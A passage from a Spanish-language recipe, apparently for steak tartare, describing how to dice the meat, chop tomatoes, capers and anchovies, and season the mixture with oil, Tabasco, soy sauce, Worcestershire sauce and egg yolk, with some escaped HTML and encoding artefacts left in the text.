Es importante que no trituremos la carne, si no que quede picada en peque\u00f1os cubitos. Reservamos cubierta de film en la nevera.<\/p>\n<p style=\"text-align: justify;\">Picamos muy finos\u00c2\u00a0los tomates secos, las alcaparras y las anchoas en daditos y reservamos por separado.\u00c2\u00a0Ponemos la carne en un bol y ali\u00f1amos removiendo constantemente. Empezamos con un buen chorrito de aceite de oliva, los tomates y las anchoas. Ponemos unas gotas de tabasco, un chorrito de salsa de soja y un poco de perrins.<\/p>\n<p style=\"text-align: justify;\">Batimos la yema y se la a\u00f1adimos a la mezcla. Debemos ir probando la carne hasta que est\u00e9 sabrosa.
